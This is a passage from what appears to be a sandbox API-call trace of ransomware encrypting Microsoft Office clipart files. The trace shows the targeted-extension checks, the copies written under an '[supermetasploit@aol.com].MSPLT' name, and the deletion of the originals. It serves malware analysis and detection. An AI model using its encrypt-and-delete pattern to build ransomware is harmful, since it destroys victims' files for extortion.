lpNumberOfBytesWritten=0x2c0fc94*=0xec, lpOverlapped=0x0) returned 1 [0313.235] SetEndOfFile (hFile=0x488) returned 1 [0313.332] CloseHandle (hObject=0x488) returned 1 [0313.339] SetFilePointerEx (in: hFile=0x54c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0313.339] SetEndOfFile (hFile=0x54c) returned 1 [0313.344] CloseHandle (hObject=0x54c) returned 1 [0313.344] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00440_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0314.000] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00440_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00440_.wmf")) returned 1 [0314.186] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00440_.WMF") returned 68 [0314.186] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00440_.WMF") returned 68 [0314.186] lstrlenW (lpString=".doc") returned 4 [0314.186] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0314.186] lstrlenW (lpString=".docx") returned 5 [0314.186] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0314.186] lstrlenW (lpString=".pdf") returned 4 [0314.186] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0314.186] lstrlenW (lpString=".xls") returned 4 [0314.186] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0314.186] lstrlenW (lpString=".xlsx") returned 5 [0314.186] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0314.186] lstrlenW (lpString=".ppt") returned 4 [0314.187] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0314.187] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00440_.WMF") returned 68 [0314.187] lstrlenW (lpString=".zip") returned 4 [0314.187] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0314.187] lstrlenW (lpString=".rar") returned 4 [0314.187] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0314.187] lstrlenW (lpString=".bz2") returned 4 [0314.187] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0314.187] lstrlenW (lpString=".7z") returned 3 [0314.187] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0314.187] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00440_.WMF") returned 68 [0314.187] lstrlenW (lpString=".dbf") returned 4 [0314.187] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0314.187] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00440_.WMF") returned 68 [0314.187] lstrlenW (lpString=".1cd") returned 4 [0314.187] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0314.187] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00440_.WMF") returned 68 [0314.187] lstrlenW (lpString=".jpg") returned 4 [0314.187] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0314.188] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00440_.WMF") returned 68 [0314.188] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00440_.WMF") returned 68 [0314.188] lstrlenW (lpString=".doc") returned 4 [0314.188] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0314.188] lstrlenW (lpString=".docx") returned 5 [0314.188] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0314.188] lstrlenW (lpString=".pdf") returned 4 [0314.188] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0314.188] lstrlenW (lpString=".xls") returned 4 [0314.188] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0314.188] lstrlenW (lpString=".xlsx") returned 5 [0314.188] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0314.188] lstrlenW (lpString=".ppt") returned 4 [0314.188] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0314.188] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00440_.WMF") returned 68 [0314.188] lstrlenW (lpString=".zip") returned 4 [0314.188] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0314.188] lstrlenW (lpString=".rar") returned 4 [0314.188] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0314.188] lstrlenW (lpString=".bz2") returned 4 [0314.189] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0314.189] lstrlenW (lpString=".7z") returned 3 [0314.189] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0314.189] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00440_.WMF") returned 68 [0314.189] lstrlenW (lpString=".dbf") returned 4 [0314.189] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0314.189] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00440_.WMF") returned 68 [0314.189] lstrlenW (lpString=".1cd") returned 4 [0314.189] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0314.189] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00440_.WMF") returned 68 [0314.189] lstrlenW (lpString=".jpg") returned 4 [0314.189] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0314.189] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0314.189] lstrlenW (lpString="BS01635_.WMF") returned 12 [0314.189] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01635_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01635_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x534 [0314.454] GetFileSizeEx (in: hFile=0x534, lpFileSize=0x2c0ff14 | out: lpFileSize=0x2c0ff14*=14996) returned 1 [0314.454] CloseHandle (hObject=0x534) returned 1 [0314.455] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01635_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01635_.wmf")) returned 0x220 [0314.455] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01635_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01635_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0314.455] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01635_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01635_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x534 [0314.455] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0314.456] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0314.456] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01635_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01635_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x524 [0314.458] GetLastError () returned 0x0 [0314.458] ReadFile (in: hFile=0x534, lpBuffer=0x3115020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesRead=0x2c0fecc*=0x3a94, lpOverlapped=0x0) returned 1 [0314.464] WriteFile (in: hFile=0x524, lpBuffer=0x3115020*, nNumberOfBytesToWrite=0x3aa0, lpNumberOfBytesWritten=0x2c0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesWritten=0x2c0fc94*=0x3aa0, lpOverlapped=0x0) returned 1 [0314.467] ReadFile (in: hFile=0x534, lpBuffer=0x3115020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesRead=0x2c0fecc*=0x0, lpOverlapped=0x0) returned 1 [0314.467] WriteFile (in: hFile=0x524, lpBuffer=0x3115020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesWritten=0x2c0fc94*=0xec, lpOverlapped=0x0) returned 1 [0314.467] SetEndOfFile (hFile=0x524) returned 1 [0314.467] CloseHandle (hObject=0x524) returned 1 [0314.467] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0314.468] SetEndOfFile (hFile=0x534) returned 1 [0314.478] CloseHandle (hObject=0x534) returned 1 [0314.478] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01635_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0314.479] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01635_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01635_.wmf")) returned 1 [0314.480] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01635_.WMF") returned 68 [0314.480] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01635_.WMF") returned 68 [0314.480] lstrlenW (lpString=".doc") returned 4 [0314.480] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0314.480] lstrlenW (lpString=".docx") returned 5 [0314.480] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0314.480] lstrlenW (lpString=".pdf") returned 4 [0314.480] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0314.480] lstrlenW (lpString=".xls") returned 4 [0314.481] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0314.481] lstrlenW (lpString=".xlsx") returned 5 [0314.481] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0314.481] lstrlenW (lpString=".ppt") returned 4 [0314.481] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0314.481] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01635_.WMF") returned 68 [0314.481] lstrlenW (lpString=".zip") returned 4 [0314.481] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0314.481] lstrlenW (lpString=".rar") returned 4 [0314.481] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0314.481] lstrlenW (lpString=".bz2") returned 4 [0314.481] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0314.481] lstrlenW (lpString=".7z") returned 3 [0314.481] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0314.481] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01635_.WMF") returned 68 [0314.481] lstrlenW (lpString=".dbf") returned 4 [0314.481] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0314.481] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01635_.WMF") returned 68 [0314.481] lstrlenW (lpString=".1cd") returned 4 [0314.481] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0314.481] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01635_.WMF") returned 68 [0314.481] lstrlenW (lpString=".jpg") returned 4 [0314.482] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0314.482] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01635_.WMF") returned 68 [0314.482] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01635_.WMF") returned 68 [0314.482] lstrlenW (lpString=".doc") returned 4 [0314.482] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0314.482] lstrlenW (lpString=".docx") returned 5 [0314.482] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0314.482] lstrlenW (lpString=".pdf") returned 4 [0314.482] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0314.482] lstrlenW (lpString=".xls") returned 4 [0314.482] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0314.482] lstrlenW (lpString=".xlsx") returned 5 [0314.482] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0314.482] lstrlenW (lpString=".ppt") returned 4 [0314.482] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0314.482] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01635_.WMF") returned 68 [0314.482] lstrlenW (lpString=".zip") returned 4 [0314.482] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0314.483] lstrlenW (lpString=".rar") returned 4 [0314.483] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0314.483] lstrlenW (lpString=".bz2") returned 4 [0314.483] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0314.483] lstrlenW (lpString=".7z") returned 3 [0314.483] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0314.483] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01635_.WMF") returned 68 [0314.483] lstrlenW (lpString=".dbf") returned 4 [0314.483] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0314.483] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01635_.WMF") returned 68 [0314.483] lstrlenW (lpString=".1cd") returned 4 [0314.483] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0314.483] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01635_.WMF") returned 68 [0314.483] lstrlenW (lpString=".jpg") returned 4 [0314.483] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0314.484] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0314.484] lstrlenW (lpString="BS01637_.WMF") returned 12 [0314.484] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01637_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01637_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x534 [0314.486] GetFileSizeEx (in: hFile=0x534, lpFileSize=0x2c0ff14 | out: lpFileSize=0x2c0ff14*=3948) returned 1 [0314.486] CloseHandle (hObject=0x534) returned 1 [0314.486] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01637_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01637_.wmf")) returned 0x220 [0314.486] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01637_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01637_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0314.486] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01637_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01637_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x534 [0314.487] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0314.487] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0314.487] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01637_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01637_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x524 [0314.488] GetLastError () returned 0x0 [0314.488] ReadFile (in: hFile=0x534, lpBuffer=0x3115020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesRead=0x2c0fecc*=0xf6c, lpOverlapped=0x0) returned 1 [0314.491] WriteFile (in: hFile=0x524, lpBuffer=0x3115020*, nNumberOfBytesToWrite=0xf70, lpNumberOfBytesWritten=0x2c0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesWritten=0x2c0fc94*=0xf70, lpOverlapped=0x0) returned 1 [0314.493] ReadFile (in: hFile=0x534, lpBuffer=0x3115020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesRead=0x2c0fecc*=0x0, lpOverlapped=0x0) returned 1 [0314.494] WriteFile (in: hFile=0x524, lpBuffer=0x3115020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesWritten=0x2c0fc94*=0xec, lpOverlapped=0x0) returned 1 [0314.494] SetEndOfFile (hFile=0x524) returned 1 [0314.494] CloseHandle (hObject=0x524) returned 1 [0314.494] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0314.495] SetEndOfFile (hFile=0x534) returned 1 [0314.499] CloseHandle (hObject=0x534) returned 1 [0314.499] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01637_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0314.500] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01637_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01637_.wmf")) returned 1 [0314.501] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01637_.WMF") returned 68 [0314.501] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01637_.WMF") returned 68 [0314.501] lstrlenW (lpString=".doc") returned 4 [0314.501] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0314.501] lstrlenW (lpString=".docx") returned 5 [0314.501] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0314.501] lstrlenW (lpString=".pdf") returned 4 [0314.501] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0314.501] lstrlenW (lpString=".xls") returned 4 [0314.501] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0314.501] lstrlenW (lpString=".xlsx") returned 5 [0314.501] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0314.501] lstrlenW (lpString=".ppt") returned 4 [0314.501] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0314.501] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01637_.WMF") returned 68 [0314.501] lstrlenW (lpString=".zip") returned 4 [0314.501] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0314.501] lstrlenW (lpString=".rar") returned 4 [0314.501] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0314.502] lstrlenW (lpString=".bz2") returned 4 [0314.502] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0314.502] lstrlenW (lpString=".7z") returned 3 [0314.502] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0314.502] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01637_.WMF") returned 68 [0314.502] lstrlenW (lpString=".dbf") returned 4 [0314.502] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0314.502] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01637_.WMF") returned 68 [0314.502] lstrlenW (lpString=".1cd") returned 4 [0314.502] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0314.502] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01637_.WMF") returned 68 [0314.502] lstrlenW (lpString=".jpg") returned 4 [0314.502] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0314.502] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01637_.WMF") returned 68 [0314.502] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01637_.WMF") returned 68 [0314.502] lstrlenW (lpString=".doc") returned 4 [0314.502] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0314.504] lstrlenW (lpString=".docx") returned 5 [0314.504] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0314.504] lstrlenW (lpString=".pdf") returned 4 [0314.504] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0314.504] lstrlenW (lpString=".xls") returned 4 [0314.504] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0314.504] lstrlenW (lpString=".xlsx") returned 5 [0314.504] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0314.504] lstrlenW (lpString=".ppt") returned 4 [0314.504] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0314.505] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01637_.WMF") returned 68 [0314.505] lstrlenW (lpString=".zip") returned 4 [0314.505] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0314.505] lstrlenW (lpString=".rar") returned 4 [0314.505] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0314.505] lstrlenW (lpString=".bz2") returned 4 [0314.505] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0314.505] lstrlenW (lpString=".7z") returned 3 [0314.505] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0314.505] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01637_.WMF") returned 68 [0314.505] lstrlenW (lpString=".dbf") returned 4 [0314.505] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0314.505] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01637_.WMF") returned 68 [0314.505] lstrlenW (lpString=".1cd") returned 4 [0314.505] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0314.505] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01637_.WMF") returned 68 [0314.505] lstrlenW (lpString=".jpg") returned 4 [0314.505] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0314.506] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0314.506] lstrlenW (lpString="BS01638_.WMF") returned 12 [0314.506] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01638_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01638_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x544 [0314.614] GetFileSizeEx (in: hFile=0x544, lpFileSize=0x2c0ff14 | out: lpFileSize=0x2c0ff14*=10538) returned 1 [0314.614] CloseHandle (hObject=0x544) returned 1 [0314.614] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01638_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01638_.wmf")) returned 0x220 [0314.614] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01638_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01638_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0314.615] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01638_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01638_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x544 [0314.615] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0314.615] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0314.615] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01638_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01638_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x51c [0314.617] GetLastError () returned 0x0 [0314.617] ReadFile (in: hFile=0x544, lpBuffer=0x3115020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesRead=0x2c0fecc*=0x292a, lpOverlapped=0x0) returned 1 [0314.621] WriteFile (in: hFile=0x51c, lpBuffer=0x3115020*, nNumberOfBytesToWrite=0x2930, lpNumberOfBytesWritten=0x2c0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesWritten=0x2c0fc94*=0x2930, lpOverlapped=0x0) returned 1 [0314.623] ReadFile (in: hFile=0x544, lpBuffer=0x3115020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesRead=0x2c0fecc*=0x0, lpOverlapped=0x0) returned 1 [0314.623] WriteFile (in: hFile=0x51c, lpBuffer=0x3115020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesWritten=0x2c0fc94*=0xec, lpOverlapped=0x0) returned 1 [0314.623] SetEndOfFile (hFile=0x51c) returned 1 [0314.624] CloseHandle (hObject=0x51c) returned 1 [0314.624] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0314.624] 